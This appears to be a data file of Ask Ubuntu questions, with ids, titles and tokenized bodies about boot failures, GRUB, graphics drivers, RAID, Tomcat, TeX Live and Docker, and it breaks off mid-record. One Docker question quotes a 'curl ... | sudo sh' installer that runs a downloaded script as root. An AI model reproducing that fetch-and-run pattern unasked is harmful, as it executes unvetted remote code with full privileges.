485443	how to resolve booting problem in my system ( 14.04 ) ?	i have installed version 14.04 64bit onto a new hard drive in my pc . it 's not booting from the hard drive . i also tried to install the 32bit version over it but when it gets to the install option screen it closes to a blank screen . i am using amd 690g processor . what could be wrong ?
485445	conversion of outlook data to xml in mono	i am in the process of converting a c # application from windows to mono . is there an equivalent resource in linux to microsoft.office.interop.outlook ? part of the application converts the data in an outlook calendar to xml .
485449	adding previously downloaded .deb files to apt using command line	how can i add previously downloaded .deb files to apt using command line so that they will not be downloaded again when i use sudo apt-get install ?
485452	can not reboot after upgrade to 14.04 : cmos/cpnv checksum bad	i installed on my old desktop ( which i use for my work at office ) the ubuntu 12.04 . yesterday i thought i should try upgrading to 14.04 through terminal commands which i found all around the net . finished downloading , installing and everything and asked me to restart . problem is at first i get a black screen stating `` cmos/cpnv checksum bad '' . if i get through this through bios ( do n't know how , i just restore optimal ) , then i face dead end . i have a white screen with blinking points and nothing works/loads . i saw around answers with command lines and terminals but i can not read anything even when i press alt+ctrl+f1 . i read about problems/clashes considering the nvidia . what can i do ? i am novice . could someone please walk me through step by step ?
485454	how to remap keys on a user level both with and without x	i want to remap capslock and i want this remap to work on both my machine with an x server and on machine without x. i also want this remap to be applied on a user level , not on a global level . this answer has a remap solution which works both with and without x . but the remap works globally and requires root permissions . is it possible to remap a key locally and have it working with and without x ?
485462	how do i safely run a graphical application as a normal user while root ?	we often talk about using gksu , sudo -i and pkexec to run things as root while a normal user but i 'm facing the opposite problem today . the script i 'm using is running as root . i need it to start a graphical application on a set user 's desktop as that user . i do n't want to bomb .xauthority or any of that , so what 's the safest way to accomplish this ?
485463	problem downloading files from ubuntu one cloud	i 've followed the instructions , but i have this back in my terminal : ./u1_downloader bash : ./u1_downloader : can not execute binary file : exec format error what am i doing wrong ?
485464	grub error : no such partition - boot-repair fails ( ssd )	i am aware that there are several questions about grub failing to find the partition . nevertheless , i was n't able to fix the issue by reinstalling , updating or reparing grub ( this is , what most of the solutions suggest ) . i 'd be very grateful , if someone with a bit more experience than me could have a look . the boot-repair output is the following : http : //paste.ubuntu.com/7668511/ the problem is , that everytime after i install ubuntu it will fail to load and grub will halt with the following message : '' error : no such partition . grub rescue > '' i have tried to look into the partitions by using the `` ls '' command , but grub will not list all partitions . the `` ls '' command shows me the follwing response : '' ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) '' i already tried to boot one of the partitions , but grub will complain with an `` unkwown filesystem '' response for all three partitions . it seems that the linux partition is completely missing from this list . do you have any suggestions ? best regards ! update : i was able to fix the issue by setting up a seperate 1 gb ext2 boot partition in the very beginning of the drive ( ssd ) . it does n't really make sense to me , because as far as i 'm aware , only computers from the stone age need this to be able to discover larger drives . nevertheless , i 'm really happy that this workaround finally solved my grub problem . if anyone has a special interest in taking a look into the linked logfile , out of curiousity i 'd still be interested in what the original problem was . however , there is absolutely no need to do so , as the problem is basically solved for me . update 2 : there seems to be a serious problem with grub adressing the partitions . now ( after creating a seperate boot partition in the beginning of the drive ) ubuntu is loading fine . when i try to access the windows partition , i however receive a new error : '' error : attempt to read or write outside of disk 'hd0 ' '' to sum it up , it seems to me as if grub had problems adressing partitions which are located at higher sectors . boot-repair still does n't help . any suggestions ?
485466	how to make realtek rtl8723a wireless lan 802.11n usb 2.0 network adapter work ?	on ubuntu 14.04 , the wifi adapter rtl8723a does n't find any network . neither of these two workarounds worked for me : wireless card realtek rtl8723ae-bt is not recognized thread on ubuntu forums i am using lenovo ideapad yoga 13 ( model 20175 ) and as of now bluetooth , speakers and mic are not working either .
485468	installation on to a hp dl120 g7 hardware raid not detected	can anyone guide me to get ubuntu server 14.04lts installed on my servers hardware raid . i have got the raid set up as raid1 using 2 1tb disks , but when i go to install the os i get the choice to either install it on one or the other drive . i can see in manual i can set up software raid but that 's not correct i 'm guessing as i have a hardware raid controller . if anyone could help me it would be much appreciated . thanks ryan
485470	adding another hdd to mirror the existing hard drive	my current setup is that i have a 160gb hdd as the primary where i have installed ubuntu server 12.04 lts . i have a additional hdd ( 2tb ) where i store my files . i want to be able to use the software raid capability of ubuntu and add another hdd ( 250gb ) to mirror the primary so in a hdd failure scenario the mirrored hdd will pick up . & all should be fine . my q. is in order to do so do i have to re-installed every thing from scratch after installing the additional hdd or can i just add the 2nd hdd to the existing set up and configure it . if its the later can you please tell me the steps involved if its not too much too ask ... thanks in advance for all your help ... ..
485477	what is the time between blinks of the terminal cursor ?	what is the time between blinks of the terminal cursor ? perhaps in terms of seconds .
485479	changing crt monitor frequency in ubuntu	i have an old crt monitor . in windows xp there was a frequency option for the monitor . is there something similar in ubuntu ? i want to change the monitor frequency from 60hz to 85hz .
485480	ubuntu does not boot / cant add ppa	its couple of days i deleted my windows and tried to check ubuntu out . it worked well until today that i started my laptop , seeing the error message `` ... operating system not found ... '' i loaded the livecd and tried to install boot repair to give it a try , fixing this error but unfortunately i faced another error . when in the terminal i want to add `` ppa : yannubuntu/boot-repair '' nothing shows up in the terminal and when i hit ctrl+alt+c i see some logs on some python files starting with softwareproperties/softwareproperties.py , line 837 , in shortcut handler to python3.4/socket.py , line 530 , in getaddrinfo . i 'm stuck and do n't know what to do , its important to have my ubuntu back again . please help .
485481	ubuntu 14.04 does n't wake up after screen is locked and blank	when i lock the screen ( super+l or ctrl+alt+l ) and wait until the screen goes dark , i ca n't resume anymore . i move my mouse and press my keyboard , but screen stays blank . my monitor goes into standby mode , if i turn it off and on again it says `` no input '' . i suppose that pressing any keyboard key or moving the mouse does n't wake it up because the keyboard is not working . the caps lock and num lock buttons do n't light up when i press them ( they usually do ) . why is the keyboard turned off when screen is locked ? it 's ubuntu 14.04 on a dell optiplex gx620 , the mouse is wireless ( logitech unifying receiver ) and the keyboard is connected via usb . i tried connecting a different mouse or keyboard to a different port . the mouse 's red laser at the bottom does light up , but the pc does not resume . i have used debian sid , arch linux and elementaryos on this computer before ubuntu , and this problem did not occur . ubuntu is the only distro which locks the screen with lightlocker , so maybe the problem is with lightlocker ... the weird thing : this does not happen if i leave the pc alone and wait until it locks itself automatically ! only if i manually lock it . edit : i ca n't access tty1-6 either .
485482	alt+f2 slow after update	i 'm using ubuntu 12.04 64-bit with xubuntu-desktop . since yesterday i noticed alt+f2 takes almost 5 seconds to start ( even without any application running ) . does anyone know why ?
485484	download size : ubuntu 14.04 iso image vs online upgrade ?	the .iso file that i can download from ubuntu 's website is 970mb . how much space will it be if i install through this notification that came ? does an upgrade download less data ?
485492	having trouble connecting through rdp to ubuntu 14.04 lts instance	i 've just completed a fresh install of ubuntu 14.04 lts onto my laptop . i installed xrdp and now i 'm trying to connect to that instance from my windows 8.1 desktop machine using the mstsc application that comes with windows ... this is my laptop running ubuntu on hyper-v ( http : //i152.photobucket.com/albums/s174/aj_draknar/20140619_072510.jpg ) when i 'm connected to instance through mstsc , this is what it looks like on my desktop machine running windows 8.1 ... ( http : //i152.photobucket.com/albums/s174/aj_draknar/20140619_072525.jpg ) i 'm assuming that the instance of ubuntu is n't configured properly to support my desktop resolution ... 1920x1080 ... any help would be most appreciated ... adthanxvance aj
485495	how to both display a command line 's output on console and save the output into a text file ?	how can i run sudo apt-get install by both seeing the process of installation ( long in my case ) and saving its output into a text file ?
485497	install gnome 3 under unity , or download gnome distro ?	my question is simple . which one should i do ? is there any difference between the two options ? i 'd use ubuntu 14.04 lts 64 bit or ubuntu gnome 14.04 lts 64 bit thanks for the answers ! : )
485505	multiple instances for tomcat not working 100 % help	im relatively new to ubuntu or any linux systems but i needed to do a test to see if i could get the program working on ubuntu . i have gone through this process of going about installing multiple instances of tomcat7 : how to install multiple instances of tomcat on a single ubuntu server using the process that was written in here and after a slight bit confussion of the last section which was this piece : name=timo desc= '' tomcat timo servlet engine '' # default=/etc/default/ $ name default=/etc/default/tomcat6 jvm_tmp=/tmp/ $ name-tmp catalina_home=/usr/share/tomcat6 # catalina_base=/var/lib/ $ name catalina_base=/opt/tomcat6/timo i thought i had managed to get it working as it did not give me any errors when i used the startup.sh file but when i go to firefox to view the tomcat page i get an empty page . there is no error message and when i look into the logs nothing seems to be popping up that says its broken . it is like that with both instances . the reason i am running 2 instances is because i would like to run geoserver on one and geowebcache on the other one . any info or help would be great . in the mod_jk.log file i get : [ 30683:140717698082688 ] [ info ] init_jk : :mod_jk.c ( 3365 ) : mod_jk/1.2.37 initialized [ 30683:140717698082688 ] [ error ] extension_fix : :jk_uri_worker_map.c9564 ) : could not find worker with name 'jk-manager ' in uri map post processing [ 30683:140717698082688 ] [ error ] extension_fix : :jk_uri_worker_map.c9564 ) : could not find worker with name 'jk-status ' in uri map post processing and an error log shows : [ mpm_event : notice ] [ pid 299559 : tid 140144594913152 ] ah00489 : apache/2.4.7 ( ubuntu ) configured -- resuming normal opertaions [ core : notice ] [ pid 29559 : tid 140144594913152 ] ah00094 : command line : '/usr/sbin/apache2' [ mpm_event : notice ] [ pid 299559 : tid 140144594913152 ] ah00491 : caught sigterm , shutting down [ mpm_event : notice ] [ pid 30684 : tid 140717698082688 ] ah00489 : apache/2.4.7 ( ubuntu ) mod_jk/1.2.37 configured -- resuming normal operations worker.properties file : # setup worker.geoserver.port=8009 # ajp port on geoserver server worker.geoserver.host=localhost worker.geoserver.type=ajp13 worker.heoserver.lbfactor=2 # setup geowebcache worker.geowebcache.port=8010 # ajp port on geoserver server worker.geowebcache.host=localhost worker.geowebcache.type=ajp13 worker.geowebcache.lbfactor=1 # setup the load-balancer worker.loadbalancer.type=lb worker.loadbalancer.balance_workers-geoserver , geowebcache worker.loadbalancer.sticky_session=true # worker.loadbalancer.sticky_session_force=true # status worker for managing load balancer worker.jk-status.type=status # setting type of jk-status 'worker i created my own virtualhost instead of using the default one as the tutorial suggested so it goes as follows : # /etc/apache2/sites-available/ourgeoserver.org < virtualhost *:80 > serveradmin support @ ourgeoserver.org serveralias live.ourgeoserver.org servername ourgeoserver.org jkmount /* loadbalancer jkmount / jk-manager /*jk-status loglevel warn errorlog /var/log/apache2/ourgeoserver_error_log customlog /var/log/apache2/ourgeoserver_access_log combined < virtualhost >
485507	what is the difference between maildir format and kmail format ?	`` configure kmail '' has a choice between these two formats , which is puzzling since i thought that kmail uses maildir format .
485511	change kde task switcher thumbnail selected color	i 'd like to change the color of the selected item in kde task switcher , since i find it really hard to see . though i have not been able to find out how to do it through system settings . here is a pic of how it 's now and somewhat how i 'd like it to be .
485514	how to properly install and use texlive with package manager in 14.04	i would like to know how to properly install , and use texlive along with the package manager tlmgr in ubuntu 14.04 . here is what i did to install texlive : sudo apt-get install texlive-latex-base texlive-latex-extra texlive-latex-recommended and now i do have texlive , but the package manager is not working . following is the error sudo tlmgr update -all ( running on debian , switching to user mode ! ) can not setup tlpdb in /home/kniwor/texmf at /usr/bin/tlmgr line 5336 . is there a better way to install texlive in 14.04 ? what can i do to fix the package manager at this point ?
485515	sinhala type help	tried to install sinhala in ibus on ubuntu 14.04 which is the lasted ubuntu version but ended up with error as follows , '' package ttf-sinhala-lklug is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : fonts-lklug-sinhala e : package 'ttf-sinhala-lklug ' has no installation candidate ''
485516	warning when using 32-bit library to build on 64 bit vm	i am trying to build a file using an application which uses this c library `` libhadoop.so '' . when doing so , the following warning message appears : openjdk 64-bit server vm warning : you have loaded library /home/mukhera3/hadoop- 2.2.0/lib/native/libhadoop.so which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . is there any way i can prevent the warning from appearing ?
485517	downloading 14.04 desktop onto a usb , is this the file i need to run the os ?	i downloaded ubuntu 14.04 desktop-amd64.iso onto a usb because there was not enough room on the dvd . is this the file i need to run the os ? it still keeps asking me to burn image to a dvd . i need the steps to install and run the os .
485518	refresh rate on crt monitor	so , i 've got a geforce 650 ti boost , on a crt monitor . my ubuntu is the latest , and i use nvidias propietary driver . i 've tried all the things that i know of to set my refresh rate to 85 hz . i'ts a old monitor , but it serves me just right . i 've tried to set on nvidias control pannel , to no avail , and to use compiz manager , again to no avail . can you help me to find another way to set the refresh rate ?
485520	320gb hdd all ubuntu , want to partition and add win 7	i am using ubuntu 14.04 blkid= /dev/sda1 : uuid= '' 05cd7e6a-caf1-44bc-9900-92ec14c5ea34 '' type= '' ext2 '' /dev/sda5 : uuid= '' j450yi-3go9-4ps2-kdqm-lnh7-go3j-frvhom '' type= '' lvm2_member '' /dev/mapper/ubuntu -- vg-root : uuid= '' 9cd5d111-ec03-4298-803a-a65fdc8790ea '' type= '' ext4 '' /dev/sdb : label= '' udf volume '' type= '' udf '' /*this is win 7 install*/ this is system monitor file system output : device directory type total available /dev/mappper/ubuntu -- vg-root / ext4 310.6gb 240.1gb /dev/sda1 /boot ext2 246.8mb 135.3mb /dev/sdb /media/name/udf 3.2gb 0 bytes i would like to partition the first drive and install win 7 from sd card at /dev/sdb i am novice level , but am comfortable and competent to cut and paste into terminal . open for suggestions for another method , no floppy drive but plenty of blank cd 's and usb drives and sd card capacity .
485521	why is /home/ < user > called 'home ' in nautilus ( and other file managers , such as pcmanfm ) ?	very simple question . when i am in my home directory in terminal and type pwd i get /home/ < myusername > . and it is the same directory when i am in nautilus home section : ubuntu and lubuntu file managers : so why is the same directory but it 's called different ways ? it 's sometimes confusing when going through the directories in terminal .
485522	saving to an internal hard drive	i added an extra internal hard drive to my computer for the purpose of saving many large ( video ) files , however i do n't know how to tell my computer to save files to this extra hard drive . i 'm sure that the ubuntu can 'see ' the hard drive , but i do n't know how to : save files directly onto this particular hard drive or move existing files onto this particular hard drive . i 'm accustomed to the windows or mac file structure , in which each disk is visible and files can easily be 'dropped in ' or directed to a particular disk . what steps should i follow to get this done ? thanks in advance for your help !
485524	smplayer problem on ubuntu 14.04	ever since i upgraded to 14.04 i 've had problems with my smplayer playback . i thought it might be an upgrade issue and so i fresh-installed the os and installed smplayer first thing , still the same issue . below is what the playback looks like , the colors are displaced . many videos also run far faster than usual . how do i solve this issue ? smplayer was installed using the following commands : sudo add-apt-repository ppa : rvm/smplayer sudo apt-get update sudo apt-get install smplayer smtube smplayer-themes smplayer-skins edit1 : more information : the graphic card is 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] pitcairn pro [ radeon hd 7850 ] ( prog-if 00 [ vga controller ] ) subsystem : xfx pine group inc. device 3264 no changes have been made to smplayer , in-fact no commands are run at all other than installing ubuntu with updates and running the above mentioned commands to install smplayer . edit2 : update i removed and purged smplayer and then installed smplayer2 and the problem persists in smplayer2 . i should mention that the problem does not occur in all files , only some . moreover removing smplayer2 and going back to smplayer causes the problem to be solved for these files , but appear for some other files that rendered properly earlier ( displaced colors , same problem ) , which is very odd . thanks .
485525	how to mass add file extension ?	my photo importer moved files from my camera and renamed them , but i forgot to specify that it should keep the file extension . so i have several folders with hundreds of jpg & avi files that are all missing their proper extension . there are n't that many video files so i can manually rename them either before of after a general mass-rename to jpg . to make things more complicated , the filenames contain spaces , so i ca n't just mv `` * '' `` *.jpg '' because , well , that does n't work ( but that 's what i 'd do , coming from dos/windows ) . i know linux is full of powerful commands . how can i mass-rename files to add a .jpg extension , when those files contain spaces ? please do n't say `` do n't use spaces '' because that 's really not what i 'm asking about . thanks .
485530	grub do not load dual boot after shutdown	i have dual boot windows 8.1 and ubuntu 13.10 . when i shut down/restart the ubuntu i get the the start screen but grub wont load . if i go to bios and then goto save changes and exit , without changing anything , grub would load . when i shut down/restart from windows i am not even able to go bios , so i take the battery of the laptop out and then put it back again . then again grub wouldn`t load , then i go to bios and follow the same procedure again . i was able to normally turn on the laptop earlier even after dual boot , but now it is creating problems . please help so that i am able to restart / shut down laptop and turn it on normally . please help .
485534	is there a distinct difference between the two ( desktop launcher and shell script )	i made a shell script ( bash ) , it 's named startup.sh then i made also desktop launcher in , ~/.local/share/applications/my.desktop i thought 1 ) and 2 ) were the same . but they do not behave in the same manner : the two command receive different environment variables . the process from `` startup.sh '' has a `` http_proxy '' variable . the process form my.desktop does n't have a http_proxy variable . i want to have the two commands use the same environment variables . if have tried using the setting for my.desktop terminal=true , which causes that program to act the same as startup.sh , but also causes a terminal to pop up , which i do not want .
485535	rsp_write failed bad file descriptor	after downloading terminal for ubuntu 12 and typing terminal in the command line i receive rsp_write ( ) failed : bad file descriptor . a white bar and under it says failover # 1 . not sure what to do from here
485538	ubuntu 14.04 lts and nvidia 9800gt	i recently aquired a new geforce 9800gt gpu and an additional monitor for my desktop . i put it into my ubuntu x64 system , and installed the new drivers , initially from nvidia , then from the apt-get directory itself . i 'm using nvidia-340 and the expected dependencies on 14.04 . i had 12.04 , but upgraded to 14.04 hoping something would be better . the gpu temperature gets hot . i am talking 100c+ . initially , the temps after startup were so high during dual-monitor idling i assumed the sensors was broken ( dumb , i know ) , but after opening up the case , i realized i could easily boil water on the gpu . since then , i 've taken the card apart , reapplied thermal paste , and blasted every bit of dirt out of the fan . i have 3 fans in the case , 1 on the gpu , 1 on the cpu , 1 on the power supply , all functioning and running comfortably without blockage . there 's no overclocking of any kind occurring . i 've tried uninstalling and reinstalling the drivers , many different fixes , though i have not cataloged them . i have tried bumblebee and removal/reinstallation of fglrx which removes/conflicts with nvidia-340 . i have also tried versions nvidia-330 and nvidia-317 from apt-get . my desktop uses an amd processor , and many of these threads are about laptops and intel processors . however , temperatures upon a single monitor climb about 1 degree every 15 seconds , without any sort of upper ceiling i want to discover at all .
485542	how to remove texlive 2009 on ubuntu 12.04	i installed texlive 2009 in my system by accident , and i have use every way i know to remove it . did not work ... sudo apt-get remove texlive reading package lists ... done building dependency tree reading state information ... done package texlive is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but if type tex in the terminal ... tex this is tex , version 3.1415926 ( tex live 2009/debian )
485546	enthought canopy unable to locate folder	i am trying to do a re-install of enthought canopy and i am following their instructions as as stated here https : //support.enthought.com/entries/23580651-uninstalling-canopy . i am unable to locate the folder ~/enthought/canopy_64bit . in step 3 they give the file path for linux as ~/enthought/canopy_64bit for win 7 c : \users\ < username > \appdata\local\enthought\canopy for mac /applications/canopy.app where is the equivalent location for ubuntu ?
485547	contain docker engine with apparmor	in face of the reminders that the docker engine should be run contained with apparmor or selinux , how to run docker under apparmor on ubuntu 14.04 ? the docker security documentation and the lxc documentation mention that ubuntu comes with apparmor templates for lxc . what has to be done to take advantage of that ? assuming a default ubuntu server 14.04 host , and docker installed with curl -s https : //get.docker.io/ubuntu/ | sudo sh , what has to be done next so that when running a container , the docker engine itself will be contained under apparmor ?
485551	screen resolution of 14.04 on microsoft azure with nomachine ( nx )	i did as follows : vm environment is microsoft azure . created a vm instance of ubuntu14.04 server edition . login via ssh installed kde desktop and nomachine ( nx ) free . from the local nx client ( version 4.2.25 ( 4.2.25 ) ) , finally successfully opened the vm desktop . however the problem is the vm screen resolution is fixed to 1152x864 , and only this value is available in displayconfiguration panel ( i had to install kscreen for unknown reason ) . so , anyhow , i tried to configure the resolution looking for /etc/x11/xorg.conf but it does not exist . how can i change the resolution of ubuntu server+desktop on azure with nomachine remote desktop ? thanks .
485552	how do i set sspd to 0 from within hciconfig 's config file	i 've read the man pages but cant find how i can set the command sudo hciconfig hci0 sspmode 0 on a config file so its persistent after reboot on ubuntu 14.04 x64
485553	how to reset some packages in ubuntu 14.04	i was trying to install gnome-photos on my ubuntu 14.04 as a dependency package i installed gtk+-3.0 on my ubuntu ( it is not available through synaptic or through default repos so i downloaded source code and installed it alongwith its own dependencies ) i think while installing gtk+-3.0 it replaced my original gtk installations and now all my ui elements have changed . mainly the toolbars and windows in applications like emacs , synaptic have changed completely but icons are still same ! ( also nautilus is working properly ! ) here are some screenshots : synaptic : settings : i do n't want this layout i want to revert back ! how can i do this ? thanks
485554	ubuntu 14.04 installation blank screen	hi guys i have an amd a10 6800k processor with inbuilt amd raedeon 8670k graphics . when i boot the ubuntu live cd , after the accessibility logo , my screen goes black and gets stuck there , and i ca n't install ubuntu .
485555	desktop wo n't display properly on monitor ( vga )	it flickered a lot during the 12.04 lts install ( it was still usable though ) , and the login screen is fine . but as soon as i log in , the desktop does n't display properly , all i see is a black screen that shows part of the desktop background ( instead of a description ) when i hover over where the dock bar should be . i know the desktop loaded properly because everything seems to respond as it should ( though i ca n't actually see anything but the outlines of the menus , tooltips , and windows ) . the monitor is an asus vs247h , and the computer is an emachines t3124 , the graphics card is an nvidia geforce 6100 . ubuntu works fine on the monitor that came with it ( about 1080x960 ) . here 's a video of the problem : http : //youtu.be/iqmt7tefxhy
485565	desktop window manager wo n't finish initialization	i 've had ubuntu 12.04 lts installed for about 6 months now , and it had been working great until the ubuntu 13 upgrade . the desktop window manager ( unity ) would n't load , so i reboot into safe graphics mode and installed gnome . everything was great , i could boot up , choose which desktop manager i wanted to load from the account login screen , and load the desktop . about a month ago , the login screen pretty much became unresponsive . i 'd get the 3 arrows pointing up at the bottom of the screen , i 'd drag them up , get the log in prompt ( but no dwm selection anymore ) and slowly , staggardly , i 'd be able to load up the desktop , but could n't really load any apps . terminal works fine , my daemons ( sickbeard , couchpotato , sabnzbd ) all load fine and i can remotely access them , but i just ca n't get the desktop to behave anymore . so far , i 've tried reinstalling gnome , unity & the x server , tried installing xubuntu and kde , did tons of reboots . i can ssh in no problem , so , long story short : can anybody help me with a sure-fire way of booting into a windows manager again via console/terminal commands ? i 'd like to avoid doing a clean install of ubuntu if at all possible , being that it took quite some time to get all my shares mounted properly and all my media daemons configured to my satisfaction . thanks in advance !
485567	unexpected end of file	can someone explain why the end of the file is unexpected on line 49 ? ( line 49 is one line after the last line ) # ! /bin/bash timeend= $ ( date -u + % h % m ) timestart= $ ( date -- date `` $ timeend 30 minutes ago '' -u + % h % m ) firsttime=0 while true do if [ [ $ firsttime -eq 0 ] ] ; then time= $ timestart increment=0 fi if [ [ $ firsttime -ne true ] ] ; then increment= $ ( ( $ increment + 2 ) ) time= $ ( ( $ timestart + $ increment ) ) fi if [ [ $ time -ge $ timeend ] ] ; then break fi gpnids < < eof radfil = nexriii|clt|tr0 radtim = `` $ time '' title = 1/-2 panel = 0 device = gif|radar '' $ increment '' .gif|1280 ; 1024|c clear = y text = 1/2/2/hw colors = 7 wind = line = clrbar = imcbar = 5/v/ll/.005 ; .6/.4 ; .01 garea = dset map = 24 + 23 + 1/1/2 + 14 + 15/1/2 latlon = 0 output = t $ mapfil = lorvus.usg + hicnus.nws + hipona.nws + louhus.nws + loisus.nws run exit eof firsttime=1 gpend done
485575	after upgrading to ubuntu 14.04 unicode fallback does not work in inkscape	i upgraded to 14.04 and opened a svg with amharic letters . the letters are አዲስ and i use the font dejavu sans . now after the upgrade , the characters are displayed wrongly . if i copy from inkscape and paste to gedit it is displayed correct in gedit edit it is amharic alphabet . the line around the letters does not belong to them , it is a rounded rectangle .
485577	dual-boot with windows 8.1 and ubuntu 14.04 ?	i have install windows 8.1 and ubuntu 14.04 on my pc . but when i am turning on my computer , ubuntu boots automatically and i can not boot windows . what can i do about it ?
485578	how to get doceri desktop fully working in ubuntu with wine and java	doceri is an awesome tool for presenters , teachers , and more . right now , it only works natively on windows and mac os . however , i love my linux desktop and through wine i have been able to most things working such as connecting to the computer over wifi with an ipad , moving the cursor remotely , drawing on the screen , and placing pictures on the screen all with the ipad . the indicator does show up and provides pop-up notifications in the indicator panel for xfce 4.8 in ubuntustudio 12.04 , and in ubuntu 14.04 with unity . i have gotten this much to work with wine 1.4 , 1.6 , 1.7 , and with windows java 1.7 u60 installed via wine . what is not working includes actually clicking with the ipad ( touching anyone on the screen should be like a left click , and a long touch should be like a right click ) , and typing does not work . i can click and manipulate the initial doceri window that is rendered with wine , but it seems that control is limited to within wine and so i can not control the rest of my desktop like system menus , firefox , terminal window , etc . i am also not able to get to the settings for the desktop application because this requires right clicking the icon in the task bar ( indicator panel ) which does not work . i was trying to get things working by symlinking folders to my native java install , but doceri looks for .dll files that are only found in the windows installation . does anyone know of a reliable way of making wine applications run on native linux java ?
485579	14.04 usb headset not recognized when plugged in	logitech usb headset : is n't recognized ( does n't show up in the sound settings applet ) when plugged in after the system boots . if it is plugged in at boot time , it is recognized , and can be removed and reinserted successfully . here is syslog when the headset is plugged in and works : jun 19 10:54:41 mlcx600 kernel : [ 12253.490219 ] usb 2-1.5.3 : new full-speed usb device number 11 using ehci-pci jun 19 10:54:41 mlcx600 kernel : [ 12253.818717 ] usb 2-1.5.3 : new usb device found , idvendor=047f , idproduct=c011 jun 19 10:54:41 mlcx600 kernel : [ 12253.818725 ] usb 2-1.5.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 jun 19 10:54:41 mlcx600 kernel : [ 12253.818729 ] usb 2-1.5.3 : product : plantronics .audio 478 usb jun 19 10:54:41 mlcx600 kernel : [ 12253.818733 ] usb 2-1.5.3 : manufacturer : plantronics jun 19 10:54:41 mlcx600 kernel : [ 12253.963251 ] input : plantronics plantronics .audio 478 usb as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5/2-1.5.3/2-1.5.3:1.3/input/input22 jun 19 10:54:41 mlcx600 kernel : [ 12253.963774 ] hid-generic 0003:047f : c011.0009 : input , hiddev0 , hidraw5 : usb hid v1.00 device [ plantronics plantronics .audio 478 usb ] on usb-0000:00:1d.0-1.5.3/input3 jun 19 10:54:41 mlcx600 mtp-probe : checking bus 2 , device 11 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5/2-1.5.3 '' jun 19 10:54:41 mlcx600 mtp-probe : bus : 2 , device : 11 was not an mtp device jun 19 10:54:42 mlcx600 rtkit-daemon [ 2147 ] : successfully made thread 8029 of process 4921 ( n/a ) owned by '1000 ' rt at priority 5 . jun 19 10:54:42 mlcx600 rtkit-daemon [ 2147 ] : supervising 5 threads of 2 processes of 1 users . jun 19 10:54:42 mlcx600 rtkit-daemon [ 2147 ] : successfully made thread 8030 of process 4921 ( n/a ) owned by '1000 ' rt at priority 5 . jun 19 10:54:42 mlcx600 rtkit-daemon [ 2147 ] : supervising 6 threads of 2 processes of 1 users . here is syslog when the headset is plugged in and does not work : jun 19 11:06:54 mlcx600 kernel : [ 237.306585 ] usb 2-1.5.3 : new full-speed usb device number 10 using ehci-pci jun 19 11:06:55 mlcx600 kernel : [ 237.634558 ] usb 2-1.5.3 : new usb device found , idvendor=047f , idproduct=c011 jun 19 11:06:55 mlcx600 kernel : [ 237.634564 ] usb 2-1.5.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 jun 19 11:06:55 mlcx600 kernel : [ 237.634567 ] usb 2-1.5.3 : product : plantronics .audio 478 usb jun 19 11:06:55 mlcx600 kernel : [ 237.634570 ] usb 2-1.5.3 : manufacturer : plantronics jun 19 11:06:55 mlcx600 kernel : [ 237.634934 ] usb 2-1.5.3 : ca n't set config # 1 , error -32 jun 19 11:06:55 mlcx600 mtp-probe : checking bus 2 , device 10 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5/2-1.5.3 '' jun 19 11:06:55 mlcx600 mtp-probe : bus : 2 , device : 10 was not an mtp device i suspect the problem is `` ca n't set config # 1 , error -32 '' but ca n't find any info on that . lsusb in both cases is the same , except for the device number : bus 002 device 008 : id 047f : c011 plantronics , inc. device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x047f plantronics , inc. idproduct 0xc011 bcddevice 2.43 imanufacturer 1 plantronics iproduct 2 plantronics .audio 478 usb iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 277 bnuminterfaces 4 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 120ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 1 control device binterfaceprotocol 0 iinterface 0 audiocontrol interface descriptor : blength 10 bdescriptortype 36 bdescriptorsubtype 1 ( header ) bcdadc 1.00 wtotallength 121 bincollection 2 bainterfacenr ( 0 ) 1 bainterfacenr ( 1 ) 2 audiocontrol interface descriptor : blength 12 bdescriptortype 36 bdescriptorsubtype 2 ( input_terminal ) bterminalid 2 wterminaltype 0x0101 usb streaming bassocterminal 0 bnrchannels 2 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 iterminal 0 audiocontrol interface descriptor : blength 12 bdescriptortype 36 bdescriptorsubtype 2 ( input_terminal ) bterminalid 1 wterminaltype 0x0201 microphone bassocterminal 0 bnrchannels 2 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 iterminal 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 3 ( output_terminal ) bterminalid 3 wterminaltype 0x0101 usb streaming bassocterminal 0 bsourceid 10 iterminal 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 3 ( output_terminal ) bterminalid 4 wterminaltype 0x0301 speaker bassocterminal 0 bsourceid 5 iterminal 0 audiocontrol interface descriptor : blength 10 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 5 bsourceid 9 bcontrolsize 1 bmacontrols ( 0 ) 0x01 mute control bmacontrols ( 1 ) 0x02 volume control bmacontrols ( 2 ) 0x02 volume control ifeature 0 audiocontrol interface descriptor : blength 10 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 6 bsourceid 1 bcontrolsize 1 bmacontrols ( 0 ) 0x03 mute control volume control bmacontrols ( 1 ) 0x00 bmacontrols ( 2 ) 0x00 ifeature 0 audiocontrol interface descriptor : blength 12 bdescriptortype 36 bdescriptorsubtype 2 ( 